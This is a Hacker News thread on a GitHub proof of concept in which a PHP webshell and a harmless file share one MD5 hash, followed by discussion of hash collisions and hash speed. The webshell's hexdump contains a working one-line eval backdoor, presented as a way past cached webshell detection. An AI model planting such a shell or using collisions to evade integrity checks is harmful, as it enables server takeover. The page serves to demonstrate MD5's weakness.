A webshell and a normal file that have the same MD5

2025-09-215:529747github.com

A webshell and a normal file that have the same MD5 - phith0n/collision-webshell

This repository contains 2 files that have the same MD5 hash:

MD5 for the files:

$ md5sum *.php
b719a17ae091ed45fb874c15b2d9663f  normal.php
b719a17ae091ed45fb874c15b2d9663f  webshell.php

Hexdump for the webshell.php:

$ hexdump -C webshell.php
00000000  3c 3f 3d 65 76 61 6c 28  24 5f 47 45 54 5b 31 5d  |<?=eval($_GET[1]|
00000010  29 3b 3f 3e 3d 62 84 11  01 75 d3 4d eb 80 93 de  |);?>=b...u.M....|
00000020  31 c1 d9 30 45 fb be 1e  71 f0 0a 63 75 a8 30 aa  |1..0E...q..cu.0.|
00000030  98 17 ca e3 00 00 00 00  bf 99 ad 4b 58 bc fc 4c  |...........KX..L|
00000040  5c ac 31 42 33 35 c4 16  05 46 c3 93 ae 3e f4 a3  |\.1B35...F...>..|
00000050  4f 8e 33 76 8c 22 19 8b  b0 31 fd ed 34 3c 56 68  |O.3v."...1..4<Vh|
00000060  08 4a 5b 47 10 ca 8d 46  ac 26 29 5f d2 bd f3 dd  |.J[G...F.&)_....|
00000070  0d b2 ac cd 3f 71 d8 a5  53 23 cb bf cf 1d 37 de  |....?q..S#....7.|
00000080  c7 50 86 48 b8 5c 6c 57  2f 49 4e 35 1e 2d 5b 31  |.P.H.\lW/IN5.-[1|
00000090  4f e1 94 68 0f 3e e9 79  b2 84 54 62 88 29 3b 09  |O..h.>.y..Tb.);.|
000000a0  67 0c 25 64 2c 6e 49 1e  1e 42 f2 9c 37 e4 34 f9  |g.%d,nI..B..7.4.|
000000b0  f6 10 cd aa 72 ec 2e 42  6a 69 5f 14 b7 b9 27 9b  |....r..Bji_...'.|
000000c0  ce fa 2c a7 7b 03 70 5b  c0 7a 43 dd 54 a0 42 cc  |..,.{.p[.zC.T.B.|
000000d0  d7 1f 89 cb db a5 eb c0  14 ba 02 d6 99 2d 28 94  |.............-(.|
000000e0  15 c4 bf 66 9d bd 69 ed  0a 27 73 a8 78 9b 83 52  |...f..i..'s.x..R|
000000f0  ea b4 4c 8d f8 7a 81 e4  5f 3b 5a f6 b8 5d 05 a0  |..L..z.._;Z..]..|
00000100  60 9f 1a 39 6a 66 bf 69  0e 38 7e 1e 0b 62 d5 2c  |`..9jf.i.8~..b.,|
00000110  ac 04 2d 0d 6d ae 27 f0  4e c7 1b 91 80 e0 fe 35  |..-.m.'.N......5|
00000120  2e 38 58 67 e3 50 6e 56  61 27 6b e8 eb 04 67 4b  |.8Xg.PnVa'k...gK|
00000130  1f 1d b7 a7 71 6b 01 18  4b d8 f8 a3 30 16 69 4f  |....qk..K...0.iO|
00000140  c7 db 95 06 0c f3 45 52  92 7e 8f f7 22 36 4f 6c  |......ER.~.."6Ol|
00000150  24 a9 14 1f f4 f2 5c 09  41 50 58 3e 75 7c b2 d6  |$.....\.APX>u|..|
00000160  bf 45 67 6a ef 18 b2 94  ac 52 50 a7 38 fa fc 52  |.Egj.....RP.8..R|
00000170  f7 36 db b4 98 31 a0 e5  43 4f 6d 3f c9 29 64 86  |.6...1..COm?.)d.|
00000180  a3 98 f9 64 9d d3 2e 1c  b2 d2 f9 35 9d 80 56 8b  |...d.......5..V.|
00000190  69 2f 9f d6 a7 83 dd 20  90 1c 31 4f 14 a6 20 20  |i/..... ..1O..  |
000001a0  21 8f 5f 6b 1e 2a 92 da  2e 4c 0a 0e 17 a9 20 c0  |!._k.*...L.... .|
000001b0  7e 62 8f 73 9a 83 32 30  71 8d f0 e0 70 c9 85 de  |~b.s..20q...p...|
000001c0  c0 80 d6 8e f6 20 77 4b  5d 9f 14 49 3d 3f aa c5  |..... wK]..I=?..|
000001d0  0c 42 92 42 9e 7f 21 43  32 ab 54 b2 33 21 c0 93  |.B.B..!C2.T.3!..|
000001e0  74 28 ed f9 25 85 60 e3  7e 32 b6 a4 4e 12 50 b7  |t(..%.`.~2..N.P.|
000001f0  0c d5 95 35 ae d7 ee 14  60 de 1f c9 cd 4b b8 ed  |...5....`....K..|
00000200

Hexdump for the normal.php:

$ hexdump -C normal.php
00000000  78 78 78 78 78 78 78 78  78 78 78 78 78 61 61 61  |xxxxxxxxxxxxxaaa|
00000010  61 61 61 61 97 25 a6 fb  17 28 1a d3 52 62 cb c7  |aaaa.%...(..Rb..|
00000020  55 d7 cd 86 e5 5f d0 83  01 9b 4d 55 06 61 ab 88  |U...._....MU.a..|
00000030  11 8a fa 4d 00 00 00 00  d9 73 ee ef 8a f6 75 2a  |...M.....s....u*|
00000040  5c ac 31 42 33 35 c4 16  05 46 c3 93 ae 3e f4 a3  |\.1B35...F...>..|
00000050  4f 8e 33 76 8c 22 19 8b  b0 31 fd ed 34 3c 56 68  |O.3v."...1..4<Vh|
00000060  08 4a 5b 47 10 ca 8d 46  ac 26 29 5f d2 c5 f3 dd  |.J[G...F.&)_....|
00000070  0d b2 ac cd 3f 71 d8 a5  53 23 cb bf cf 1d 37 de  |....?q..S#....7.|
00000080  c7 50 86 48 b8 5c 6c 57  2f 49 4e 35 1e 2d 5b 31  |.P.H.\lW/IN5.-[1|
00000090  4f e1 94 68 0f 3e e9 79  b2 84 54 62 88 29 3b 09  |O..h.>.y..Tb.);.|
000000a0  67 0c 25 64 2c 6e 49 1e  1e 42 f2 9c 37 c4 34 f9  |g.%d,nI..B..7.4.|
000000b0  f6 10 cd aa 72 ec 2e 42  6a 69 5f 14 b7 b9 27 9b  |....r..Bji_...'.|
000000c0  ce fa 2c a7 7b 03 70 5b  c0 7a 43 dd 54 a0 42 cc  |..,.{.p[.zC.T.B.|
000000d0  d7 1f 89 cb db a5 eb c0  14 ba 02 d6 99 2d 28 94  |.............-(.|
000000e0  15 c4 bf 66 9d bd 69 ed  0a 27 73 a8 7a 9b 83 52  |...f..i..'s.z..R|
000000f0  ea b4 4c 8d f8 7a 81 e4  5f 3b 5a f6 b8 5d 05 a0  |..L..z.._;Z..]..|
00000100  60 9f 1a 39 6a 66 bf 69  0e 38 7e 1e 0b 62 d5 2c  |`..9jf.i.8~..b.,|
00000110  ac 04 2d 0d 6d ae 27 f0  4e c7 1b 91 80 e0 fe 35  |..-.m.'.N......5|
00000120  2e 38 58 67 e3 50 6e 56  61 27 6b e8 6b 05 67 4b  |.8Xg.PnVa'k.k.gK|
00000130  1f 1d b7 a7 71 6b 01 18  4b d8 f8 a3 30 16 69 4f  |....qk..K...0.iO|
00000140  c7 db 95 06 0c f3 45 52  92 7e 8f f7 22 36 4f 6c  |......ER.~.."6Ol|
00000150  24 a9 14 1f f4 f2 5c 09  41 50 58 3e 75 7c b2 d6  |$.....\.APX>u|..|
00000160  bf 45 67 6a ef 18 b2 94  ac 52 50 a7 38 fa f8 52  |.Egj.....RP.8..R|
00000170  f7 36 db b4 98 31 a0 e5  43 4f 6d 3f c9 29 64 86  |.6...1..COm?.)d.|
00000180  a3 98 f9 64 9d d3 2e 1c  b2 d2 f9 35 9d 80 56 8b  |...d.......5..V.|
00000190  69 2f 9f d6 a7 83 dd 20  90 1c 31 4f 14 a6 20 20  |i/..... ..1O..  |
000001a0  21 8f 5f 6b 1e 2a 92 da  2e 4c 0a 0e 17 a9 20 be  |!._k.*...L.... .|
000001b0  7e 62 8f 73 9a 83 32 30  71 8d f0 e0 70 c9 85 de  |~b.s..20q...p...|
000001c0  c0 80 d6 8e f6 20 77 4b  5d 9f 14 49 3d 3f aa c5  |..... wK]..I=?..|
000001d0  0c 42 92 42 9e 7f 21 43  32 ab 54 b2 33 21 c0 93  |.B.B..!C2.T.3!..|
000001e0  74 28 ed f9 25 85 60 e3  7e 32 b6 a4 4e 12 30 b7  |t(..%.`.~2..N.0.|
000001f0  0c d5 95 35 ae d7 ee 14  60 de 1f c9 cd 4b b8 ed  |...5....`....K..|
00000200

Can use it bypass some cached webshell detections.

References:


Read the original article

Comments

  • By Dwedit 2025-09-245:27

    Proof of Concept or GTFO issue 0x14 is a PDF document file that can also be run as a NES ROM. The file will display its own MD5 hash in a PDF viewer, and also displays its own MD5 hash in a NES emulator (only first 40KB+16 bytes are actually loaded there)

    https://github.com/angea/pocorgtfo#0x14

    And yes, documents are not normally supposed to be able to display their own MD5 hash.

  • By Retr0id 2025-09-2410:24

    I made https://github.com/DavidBuchanan314/monomorph, which packs up to 4KB of shellcode into an executable that always has the same hash. So you're not just limited to a good/evil pair, you can arbitrarily change the behaviour in future without changing the hash.

    Also, a more recent innovation in MD5 collisions is textcoll, which creates colliding blocks that are completely plaintext. This would allow for colliding PHP source files like in OP but without any obvious binary artefacts (although this requires identical prefixes).

    https://github.com/cr-marcstevens/hashclash?tab=readme-ov-fi...

  • By magicalhippo 2025-09-248:141 reply

    Not only is MD5 broken as shown here, if you have a modern CPU it's also quite slow compared to good, non-broken alternatives. See for example this comparison[1] (post says JavaScript but it's actually OpenSSL's implementation that's actually tested).

    [1]: https://lemire.me/blog/2025/01/11/javascript-hashing-speed-c...

    • By gruez 2025-09-2410:022 reply

      I only see new CPUs benchmarked, maybe that's because newer CPUs have SHA acceleration extensions? I'd expect SHA256 to be more complex and therefore be more computationally expensive.

      • By sltkr 2025-09-2410:482 reply

        Yes, SHA256 is faster than MD5 only if you have hardware accelleration. But SHA256 itself is pretty slow compared to the state of the art. For example, BLAKE3 is just as secure as SHA256 but an order of magnitude faster.

        Try this on your own system:

            $ head -c 1000000000 /dev/urandom > random-1gb
            
            $ time md5sum random-1gb 
            ef72a3616aad5117ddf40a7d5f5d0162  random-1gb
            
            real 0m2.428s
            user 0m2.192s
            sys 0m0.202s
            
            $ time sha256sum random-1gb 
            ec7d7f31c4489acae8328fddbe54157f1cb9e97b220ef502a07e1f9230969310  random-1gb
            
            real 0m3.894s
            user 0m3.697s
            sys 0m0.181s
            
            $ time b3sum random-1gb 
            11fe11cc5721faf65369d18893d7b7631f6178b4692bc0bb03b1b180273cd384  random-1gb
            
            real 0m0.282s !!!
            user 0m0.876s
            sys 0m0.124s
            
            $ time b3sum --num-threads=1 random-1gb 
            11fe11cc5721faf65369d18893d7b7631f6178b4692bc0bb03b1b180273cd384  random-1gb
            
            real 0m0.597s
            user 0m0.488s
            sys 0m0.107s
        
        This is on an old Chromebook with Intel(R) Core(TM) m3-6Y30 CPU @ 0.90GHz CPU (dual core, but with hyperthreading). Note that even using only a single thread (which SHA256 and MD5 are limited to by their design), BLAKE3 is 6x as fast as SHA256 and 4x as fast as MD5.

        • By edgineer 2025-09-258:202 reply

          >BLAKE3 is just as secure as SHA256 but an order of magnitude faster

          Is this not an oxymoron? E.g. b3 then ought to be an order of magnitude easier to brute force.

          • By oconnor663 2025-09-2521:24

            This is a common misconception, based on the difference between password hashing and other general uses for a cryptographic hash. Password hashing is special, because we want to protect people who pick terrible passwords, so we need guess-and-check to be expensive. But for most other use cases, like say HMAC or signing, the number of possible inputs is so astronomically large that guess-and-check would be impossible even if each guess was e.g. just a single add instruction. This distinction is why we say never to use a general purpose hash with passwords.

          • By sltkr 2025-09-2512:07

            I'm talking about theoretic security, i.e. number of operations needed to perform certain attacks.

            For a 256-bit cryptographic hash function, it should take an expected 2^256 attempts to find a message with a given hash (preimage attack) and around 2^128 attempts to find any collision (due to the birthday paradox), and a few other properties like that. This holds for both SHA-256 and Blake3 (as far as we know—neither algorithm has proven security*) but not for MD5.

            MD5 is insecure not just because its output size of 128 bit is too short (though that's a problem too), but also because it has weaknesses that allow constructing collisions with much less than the 2^64 attempts than you would expect on the basis of its output size. That's why MD5 is considered insecure even for its size.

            Generally speaking, you want your hashing primitives to be as fast as possible. The practical security then comes from the output size. If someone discovered a secure 320-bit cryptographic hash that is a trillion times faster than even Blake3 (10^12 or about 2^40), everyone should adopt it, because it would be much faster and even more secure against brute force attacks than SHA-256/Blake3 are (since 320 > 256 + 40).

            While there are use cases for deliberately slow hash functions too (notably password hashing) those can be constructed using fast hash functions as primitives. For example, one of the strongest password hashing schemes (Argon2) is based on one of the fastest hashing primitives (Blake2), not a slow one as you might have expected.

        • By adrian_b 2025-09-2411:121 reply

          Unlike SHA-256, BLAKE3 can be evaluated in parallel, so the speedup factor over SHA-256 depends on the number of available CPU cores.

          While BLAKE3 can be many times faster than SHA-256, by consuming many times more power, the amount of work for computing a hash differs much less between the 2 hashes than the execution time on a multi-core CPU.

          The speed difference quoted by you for a single thread is caused by your Skylake-based CPU, which does not have the SHA hardware instructions.

          Moreover, even the programs that claim to use the SHA hardware instructions may have a speed several times lower than allowed by the hardware, because the more recent CPUs, e.g. from the last 4 years, have wider SHA instructions than the older CPUs, but the programs must have been compiled to support such CPUs, e.g. Zen 3 and newer or Alder Lake and newer.

          • By amelius 2025-09-2412:042 reply

            This makes me wonder how much security suffers if you split a file in N smaller files, compute a hash for each of them, then hash the concatenation of the hashes.

            • By adrian_b 2025-09-2413:10

              BLAKE3 and other parallelizable hashes do exactly this, but using a somewhat more complex algorithm, which ensures that the result is a secure hash.

              Such an algorithm has been first published by Ralph Merkle, in 1979, but it has been improved later:

              https://en.wikipedia.org/wiki/Merkle_tree

              For security, it is necessary to use different hash functions at different levels in the hash tree, but this is trivially achieved by using the same hash function, but also hashing some extra distinguishing data besides the hashes from the previous level.

            • By oconnor663 2025-09-2413:43

              It's "easy" to do it right but also very common to do it wrong: https://jacko.io/tree_hashing.html

      • By adrian_b 2025-09-2411:06

        Hardware SHA-1 and SHA-256 are now supported by many CPUs, many of which are already older than a decade, i.e. almost all 64-bit ARM-based CPUs, all AMD Zen, many generations of Intel Atom and the Intel Core CPUs starting with Ice Lake.

        The only CPUs still likely to be in use and without SHA support are the Intel Core CPUs until and including the Skylake derivatives (i.e. up to Comet Lake, i.e. up to 6 years ago).

        The Intel Atoms have received SHA support many years before Intel Core, because they competed with ARM, which already had such support.

        The support in Intel Core has been added due to AMD Zen, but the products with it have been delayed by the failure of Intel to achieve acceptable fabrication yields in their 10-nm CMOS process, before 2019/2020.

HackerNews